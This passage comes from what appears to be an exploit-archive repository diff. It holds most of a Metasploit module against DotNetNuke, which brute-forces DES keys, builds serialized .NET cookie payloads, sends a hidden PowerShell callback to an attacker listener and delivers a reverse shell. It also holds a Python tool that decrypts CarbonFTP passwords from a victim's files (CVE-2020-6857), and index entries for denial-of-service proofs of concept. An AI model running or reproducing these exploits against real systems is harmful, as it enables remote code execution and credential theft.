55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83,
121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101,
109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46,
48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114,
97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101,
110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93,
93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86,
101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32,
80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55,
55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0,
73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110,
61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61,
110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68,
105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101,
115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0,
0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116,
105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101,
114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108,
121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83,
105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117,
114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101,
110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1,
1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91,
93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83,
121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83,
121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62,
83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105,
99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40,
83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83,
121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0,
10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97,
114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109,
46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50,
32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46,
83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83,
116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101,
109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83,
121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1,
16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109,
46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121,
115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99,
111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110,
101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0,
0, 0, 9, 22, 0, 0, 0, 10, 11
]
@cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/
# ==================
# v9.1.1+ VARIABLES
# ==================
@key_charset = "02468ABDF"
@verification_codes = []
@iv_regex = /[0-9A-F]{8}/
# Known plaintext
@kpt = ""
# Encryption objects
@decryptor = OpenSSL::Cipher.new('des')
@decryptor.decrypt
@encryptor = OpenSSL::Cipher.new('des')
@encryptor.encrypt
# final passphrase (key +iv) to use for payload (v9.1.1+)
@passphrase = ""
# ==================
# v9.2.0+ VARIABLES
# ==================
# Session token needed for exploitation (v9.2.0+)
@session_token = ""
# ==================
# v9.2.2+ VARIABLES
# ==================
# User ID format (v9.2.2+)
# Number of characters of user ID available in plaintext
# is equal to the length of a GUID (no spaces or dashes)
# minus (blocksize - known plaintext length).
@user_id_pt_length = 32 - (8 - @kpt.length)
@user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/
# Plaintext found from decryption (v9.2.2+)
@found_pt = ""
@iv_charset = "0123456789abcdef"
# Possible IVs used to encrypt verification codes (v9.2.2+)
@possible_ivs = Set.new([])
# Possible keys used to encrypt verification codes (v9.2.2+)
@possible_keys = Set.new([])
# passphrases (key + iv) values to use for payload encryption (v9.2.2+)
@passphrases = []
# char sets to use when generating possible base keys
@unchanged = Set.new([65,70])
end
def decode_verification(code)
# Decode verification code base don DNN format
return String.new(
Rex::Text.decode_base64(
code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=")
)
)
end
# ==============
# Main function
# ==============
def exploit
return unless check == Exploit::CheckCode::Appears
@encrypted = datastore['ENCRYPTED']
verification_code = datastore['VERIFICATION_CODE']
if File.file?(verification_code)
File.readlines(verification_code).each do |code|
@verification_codes.push(decode_verification(code))
end
else
@verification_codes.push(decode_verification(verification_code))
end
@kpt = datastore['VERIFICATION_PLAIN']
@session_token = datastore['SESSION_TOKEN']
@dry_run = datastore['DryRun']
key = datastore['KEY']
iv = datastore['IV']
if target['ReqEncrypt'] && @encrypted == false
print_warning("Target requires encrypted payload. Exploit may not succeed.")
end
if @encrypted
# Requires either supplied key and IV, or verification code and plaintext
if (!key.blank? && !iv.blank?)
@passphrase = key + iv
# Key and IV were supplied, don't try and decrypt.
@try_decrypt = false
elsif (!@verification_codes.empty? && !@kpt.blank?)
@try_decrypt = true
else
fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).")
end
end
if target['ReqSession']
if @session_token.blank?
fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.")
end
end
if @encrypted && @try_decrypt
# Set IV for decryption as the known plaintext, manually
# apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.
# For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time.
# For v9.2.2+ it will find an initial base key faster than if padding were enabled.
f8_plain = @kpt[0, 8]
c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length)
@decryptor.iv = String.new(c_iv.pack("C*"))
@decryptor.padding = 0
key = find_key(@verification_codes[0])
if key.blank?
return
end
if @target_idx == 4
# target is v9.2.2+, requires base64 generated key and IV values.
generate_base_keys(0, key.each_byte.to_a, "")
vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}")
# re-enable padding here as it doesn't have the
# same performance impact when trying to find possible IV values.
@decryptor.padding = 1
print_warning("Finding possible base IVs. This may take a few minutes...")
start = Time.now
find_ivs(@verification_codes, key)
elapsed = Time.now - start
vprint_status(
format(
"Found %<n_ivs>d potential Base IV values using %<n_codes>d "\
"verification codes in %<e_time>.2f seconds.",
n_ivs: @possible_ivs.size,
n_codes: @verification_codes.size,
e_time: elapsed.to_s
)
)
generate_payload_passphrases
vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size))
end
if @passphrase.blank?
# test all generated passphrases by
# sending an exploit payload to the target
# that will callback to an HTTP listener
# with the index of the passphrase that worked.
# set SRVHOST as LHOST value for HTTPServer mixin
datastore['SRVHOST'] = datastore['LHOST']
print_warning("Trying all possible KEY and IV combinations...")
print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
start_service
vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
test_passphrases
# If no working passphrase has been found,
# wait to allow the the chance for the last one to callback.
if @passphrase.empty? && !@dry_run
sleep(wfs_delay)
end
if service
stop_service
end
print "\r\n"
if !@passphrase.empty?
print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
end
end
end
send_exploit_payload
end
# =====================
# For the check command
# =====================
def check
if target.name == 'Automatic'
select_target
end
@target_idx = Integer(datastore['TARGET'])
if @target_idx == 0
fail_with(Failure::NoTarget, 'No valid target found or specified.')
end
# Check if 404 page is custom or not.
# Vulnerability requires custom 404 handling (enabled by default).
uri = normalize_uri(target_uri.path)
print_status("Checking for custom error page at: #{uri} ...")
res = send_request_cgi(
'uri' => uri
)
if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
print_good("Custom error page detected.")
else
print_error("IIS Error Page detected.")
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
# ===========================
# Auto-select target version
# ===========================
def select_target
print_status("Trying to determine DNN Version...")
# Check for copyright version in /Documentation/license.txt
uri = %r{^(.*[\\\/])}.match(target_uri.path)[0]
vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri + 'Documentation', 'License.txt')
)
year = -1
if res && res.code == 200
# License page found, get latest copyright year.
matches = @cr_regex.match(res.body)
if matches
year = matches[0].to_i
end
else
vprint_status("Checking version at #{uri} ...")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri)
)
if res && res.code == 200
# Check if copyright info is in page HTML.
matches = @cr_regex.match(res.body)
if matches
year = matches[0].to_i
end
end
end
if year >= 2018
print_warning(
%q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN.
Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2.
Try setting target 4 and supply a file of of verification codes or specifiy valid Key and IV values.")
)
datastore['TARGET'] = 3
elsif year == 2017
print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
datastore['TARGET'] = 2
elsif year < 2017 && year > 2008
print_good("DNN Version Found: v5.1.0 - v9.0.1")
datastore['TARGET'] = 1
elsif year == 2008
print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).")
datastore['TARGET'] = 1
else
print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value")
end
end
# ==============================
# Known plaintext attack to
# brute-force the encryption key
# ==============================
def find_key(cipher_text)
print_status("Finding Key...")
# Counter
total_keys = @key_charset.length**8
i = 1
# Set start time
start = Time.now
# First char
@key_charset.each_byte do |a|
key = a.chr
# 2
@key_charset.each_byte do |b|
key[1] = b.chr
# 3
@key_charset.each_byte do |c|
key[2] = c.chr
# 4
@key_charset.each_byte do |d|
key[3] = d.chr
# 5
@key_charset.each_byte do |e|
key[4] = e.chr
# 6
@key_charset.each_byte do |f|
key[5] = f.chr
# 7
@key_charset.each_byte do |g|
key[6] = g.chr
# 8
@key_charset.each_byte do |h|
key[7] = h.chr
if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key))
elapsed = Time.now - start
print_search_status(i, elapsed, total_keys)
print_line
if @target_idx == 4
print_good("Possible Base Key Value Found: " + key)
else
print_good("KEY Found: " + key)
print_good("IV Found: " + @passphrase[8..-1])
end
vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s))
return String.new(key)
end
# Print timing info every 5 million attempts
if i % 5000000 == 0
print_search_status(i, Time.now - start, total_keys)
end
i += 1
end
end
end
end
end
end
end
end
elapsed = Time.now - start
print_search_status(i, elapsed, total_keys)
print_line
print_error("Key not found")
vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s))
return nil
end
# ==================================
# Attempt to decrypt a ciphertext
# and obtain the IV at the same time
# ==================================
def decrypt_data_and_iv(cipher, cipher_text, key)
cipher.key = key
begin
plaintext = cipher.update(cipher_text) + cipher.final
if @target_idx == 4
# Target is v9.2.2+
user_id = plaintext[8, @user_id_pt_length]
if @user_id_regex.match(user_id)
return true
end
return false
end
# This should only execute if the version is 9.1.1 - 9.2.1
iv = plaintext[0, 8]
if !@iv_regex.match(iv)
return false
end
# Build encryption passphrase as DNN does.
@passphrase = key + iv
# Encrypt the plaintext value using the discovered key and IV
# and compare with the initial ciphertext
if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase)
@passphrases.push(String.new(key + iv))
return true
end
rescue StandardError
# Ignore decryption errors to allow execution to continue
return false
end
return false
end
def print_search_status(num_tries, elapsed, max_tries)
msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100)
print("\r%bld%blu[*]%clr #{msg}")
end
# ===========================
# Encrypt data using the same
# pattern that DNN uses.
# ===========================
def encrypt_data(cipher, message, passphrase)
cipher.key = passphrase[0, 8]
cipher.iv = passphrase[8, 8]
return cipher.update(message) + cipher.final
end
# ===============================================
# Generate all possible base key values
# used to create the final passphrase in v9.2.2+.
# DES weakness allows multiple bytes to be
# interpreted as the same value.
# ===============================================
def generate_base_keys(pos, from_key, new_key)
if !@unchanged.include? from_key[pos]
if from_key[pos] % 2 == 0
new_key[pos] = (from_key[pos] + 1).chr
else
new_key[pos] = (from_key[pos] - 1).chr
end
if new_key.length == 8
@possible_keys.add(String.new(new_key))
# also add key with original value
new_key[pos] = (from_key[pos]).chr
@possible_keys.add(String.new(new_key))
else
generate_base_keys(pos + 1, from_key, String.new(new_key))
# also generate keys with original value
new_key[pos] = (from_key[pos]).chr
generate_base_keys(pos + 1, from_key, String.new(new_key))
end
else
new_key[pos] = (from_key[pos]).chr
if new_key.length == 8
@possible_keys.add(String.new(new_key))
else
generate_base_keys(pos + 1, from_key, String.new(new_key))
end
end
end
# ==============================================
# Find all possible base IV values
# used to create the final Encryption passphrase
# ==============================================
def find_ivs(cipher_texts, key)
num_chars = 8 - @kpt.length
f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/
@decryptor.key = key
found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
# Find all possible IVs for the first ciphertext
brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
# Reduce IV set by testing against other ciphertexts
cipher_texts.drop(1).each do |cipher_text|
@possible_ivs.each do |iv|
@decryptor.iv = iv
pt = @decryptor.update(cipher_text) + @decryptor.final
if !f8regex.match(pt[0, 8])
@possible_ivs.delete(iv)
end
end
end
end
# ==========================================
# A recursive function to find all
# possible valid IV values using brute-force
# ==========================================
def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt)
charset = "0123456789abcdef"
if num_chars_needed == 0
@decryptor.key = key
@decryptor.iv = pt_prefix
pt = @decryptor.update(cipher_text) + @decryptor.final
iv = pt[0, 8]
if @iv_regex.match(iv)
pt = pt_prefix + found_pt
if encrypt_data(@encryptor, pt, key + iv) == cipher_text
@possible_ivs.add(String.new(iv))
end
end
return
end
charset.length.times do |i|
brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt)
end
end
# ========================================
# Generate all possible payload encryption
# passphrases for a v9.2.2+ target
# ========================================
def generate_payload_passphrases
phrases = Set.new(@passphrases)
@possible_keys.each do |key|
@possible_ivs.each do |iv|
phrase = Rex::Text.encode_base64(
encrypt_data(@encryptor, key + iv, key + iv)
)
phrases.add(String.new(phrase[0, 16]))
end
end
@passphrases = phrases.to_a
end
# ===========================================
# Test all generated passphrases by initializing
# an HTTP server to listen for a callback that
# contains the index of the successful passphrase.
# ===========================================
def test_passphrases
for i in 0..@passphrases.size - 1
# Stop sending if we've found the passphrase
if !@passphrase.empty?
break
end
msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size)
print("\r%bld%blu[*]%clr #{msg}")
url = "#{get_uri}?#{get_resource.delete('/')}=#{i}"
payload = create_request_payload(url)
cookie = create_cookie(payload)
# Encrypt cookie value
enc_cookie = Rex::Text.encode_base64(
encrypt_data(@encryptor, cookie, @passphrases[i])
)
if @dry_run
print_line
print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...")
print_line(enc_cookie)
break
end
execute_command(enc_cookie, host: datastore['RHOST'])
end
end
# ===============================
# Request handler for HTTP server.
# ==============================
def on_request_uri(cli, request)
# Send 404 to prevent scanner detection
send_not_found(cli)
# Get found index - should be the only query string parameter
if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s]
index = request.qstring[get_resource.delete('/').to_s].to_i
@passphrase = String.new(@passphrases[index])
end
end
# ==============================================
# Create payload to callback to the HTTP server.
# Note: This technically exploits the
# vulnerability, but provides a way to determine
# the valid passphrase needed to exploit again.
# ==============================================
def create_request_payload(url)
psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\""
psh_cmd_bytes = psh_cmd.bytes.to_a
cmd_size_bytes = write_encoded_int(psh_cmd.length)
# Package payload into serialized object
payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
object_size = write_encoded_int(payload_object.length)
# Create the final seralized ObjectStateFormatter payload
final_payload = @osf_header + object_size + payload_object
b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
return b64_payload
end
# =============================================
# Reproduce the WriteEncoded method in
# the native .NET ObjectStateFormatter.cs file.
# =============================================
def write_encoded_int(value)
enc = []
while (value >= 0x80)
v = value | 0x80
enc.push([v].pack("V")[0].unpack1("C*"))
value >>= 7
end
enc.push([value].pack("V")[0].unpack1("C*"))
return enc
end
# =================================
# Creates the payload cookie
# using the specified payload
# =================================
def create_cookie(payload)
cookie = "<profile>"\
"<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\
"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\
"[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\
"Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\
"Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\
"<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
"<ProjectedProperty0>"\
"<MethodName>Deserialize</MethodName>"\
"<MethodParameters>"\
"<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
"xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\
">#{payload}</anyType>"\
"</MethodParameters>"\
"<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\
"i:type=\"ObjectStateFormatter\" />"\
"</ProjectedProperty0>"\
"</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\
"</item>"\
"</profile>"
return cookie
end
# =========================================
# Send the payload to the target server.
# =========================================
def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port })
uri = normalize_uri(target_uri.path)
res = send_request_cgi(
'uri' => uri,
'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};"
)
if !res
fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.")
elsif res.code == 404
return true
elsif res.code == 400
fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}")
else
fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}")
end
end
# ======================================
# Create and send final exploit payload
# to obtain a reverse shell.
# ======================================
def send_exploit_payload
cmd_payload = create_payload
cookie_payload = create_cookie(cmd_payload)
if @encrypted
if @passphrase.blank?
print_error("Target requires encrypted payload, but a passphrase was not found or specified.")
return
end
cookie_payload = Rex::Text.encode_base64(
encrypt_data(@encryptor, cookie_payload, @passphrase)
)
end
if @dry_run
print_warning("DryRun enabled. No exploit payloads have been sent to the target.")
print_warning("Printing exploit cookie payload...")
print_line(cookie_payload)
return
end
# Set up the payload handlers
payload_instance.setup_handler
# Start the payload handler
payload_instance.start_handler
print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...")
execute_command(cookie_payload, host: datastore['RHOST'])
end
# ===================================
# Create final exploit paylod based on
# supplied payload options.
# ===================================
def create_payload
# Create payload
psh_cmd = "/b /c start /b /min " + cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
remove_comspec: true, encode_final_payload: false
)
psh_cmd_bytes = psh_cmd.bytes.to_a
cmd_size_bytes = write_encoded_int(psh_cmd.length)
# Package payload into serialized object
payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end
object_size = write_encoded_int(payload_object.length)
# Create the final seralized ObjectStateFormatter payload
final_payload = @osf_header + object_size + payload_object
b64_payload = Rex::Text.encode_base64(final_payload.pack("C*"))
vprint_status("Payload Object Created.")
return b64_payload
end
end

241
exploits/windows/remote/48363.py Executable file
View file

@ -0,0 +1,241 @@
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857
import time, string, sys, argparse, os, codecs
#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.
#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds
def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)
def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])
#Updated for Python version compatibility.
def hex2ascii(h):
h=h.strip()
passwd=""
try:
passwd = codecs.decode(h, "hex").decode("ascii")
except Exception as e:
print("[!] In hex2ascii(), not a valid hex string.")
exit()
return passwd
def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst
def strip_non_printable_char(str):
return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
cnt = 0
passwd_str=""
def deob(c):
global cnt, passwd_str
tmp=""
try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()
b=""
a=""
#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]
passwd_str += strip_non_printable_char(hex2ascii(a + b))
hex_passwd_lst = list(passwd_str)
return hex_passwd_lst
def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False
def decryptor(result_lst):
global passwd_str, sz
print(" Decrypting ... \n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)
#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)
#Flag possible single char password.
no_unique_chars(lst)
print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.
passwd_str=""
return reordered_pass
def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()
def main(args):
global passwd_str, sz
victim=""
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Version 2 Exploit fixed for Python 3 compatibility")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSec\n")
time.sleep(1)
#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()
#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)
if __name__=="__main__":
parser = argparse.ArgumentParser()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()
main(parse_args())

93
files_exploits.csv
View file

@ -6692,6 +6692,17 @@ id,file,description,date,author,type,platform,port
48259,exploits/windows/dos/48259.py,"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)",2020-03-27,"Ivan Marmolejo",dos,windows,
48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows,
48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows,
48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows,
48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows,
48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
